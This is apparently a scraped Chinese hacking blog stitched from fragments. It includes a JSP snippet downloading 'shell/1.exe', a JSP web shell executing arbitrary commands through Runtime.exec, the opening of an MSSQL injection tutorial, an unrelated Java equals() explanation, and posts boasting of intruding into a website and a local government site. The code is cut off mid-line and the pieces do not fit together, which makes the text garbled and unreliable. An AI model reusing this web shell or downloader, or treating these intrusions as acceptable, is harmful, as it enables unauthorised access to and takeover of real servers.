<%@ page language="java" contentType="text/html; charset=gb2312" %>
<%@ page language="java" import="java.util.*" %>
<%
    String[] weekdays={"","日","一","二","三","四","五","六"};
    String[] days=new String[42];
    for(int i=0;i<42;i++)
    days[i]="

转自网络

<%@ page import="java.io.*, java.net.*" %>   
<%    
try {     
    String urlname = "http://127.0.0.1:8080/shell/1.exe";   
    URL url = new URL(urlname);   
    URLConnection conn = url.openConnection();   

刚入侵一个站，发现这个站用的是南方企业数据网的程序，于是就找了一下漏洞信息，
网上的漏洞信息如下注入漏洞

**************************
By：XoL-!
http://www.tsbct.com
************************** 发现日期:
2008-09-25
影响版本: v10.0 v11.0

equals 方法（是String类从它的超类Object中继承的）被用来检测两个对象是否相等，即两个对象的内容是否相等。

java语言的本意来说：如果没有重写（override）
新类的equals()，则该方法和 == 操作符一样在两个变量指向同一对象时返回真，（即比较的是引用而不是内容）
但是java推荐的是使用equals()方法来判断两个对象的内容是否一样.比如String，Date，File类就已经通过覆盖equals()方法来比较对象内容而不是引用

==用于比较引用和比较基本数据类型时具有不同的功能：

转自网络

cx和剑心等大牛在06年的时候就已经在用这种语法了，而我等小辈到最近才领略到，惭愧惭愧......

手头暂时没有注入点测试，就先以我机器上的MSSQL做实验吧。
下面的语句我直接写完整的SQL语句，注入的时候稍微改改就能用了，呵呵。

但是我们是不知道表明，不知道列名的....

如果这个注入点原来的SQL语句是:"select * from FK_admin where x_name='"&username&"'"
我们可以在用户名提交的地方填

博客暂停更新。

      整理心情。。。。。。潜心修炼。。。。。。。。。。。。。

<%@ page language="java" import="java.util.*,java.io.*,java.net.*" pageEncoding="gb2312"%>
<%!
public static String exec(String cmd, Writer out) throws IOException
{
StringBuffer sb = new StringBuffer();
int len = 0;
byte by[] = new byte[cmd.length() * 10];
Process p = Runtime.getRuntime().exec(cmd);
InputStream is = p.getInputStream();
while((len = is.read(by)) != -1)
{
    String str = n

本地政府网。。。。小站一个，本人很少动政府站，做事一向很低调。。。。但今天简单动了一下本地政府站。。记得刚入道的时候看过这站，可能当时掌握的知识有限，没能拿下该站，今天看了一下，简单搞定。。。一定程度上说明自己的知识在不断增长，所以纪念下。。。

继续努力。。。。。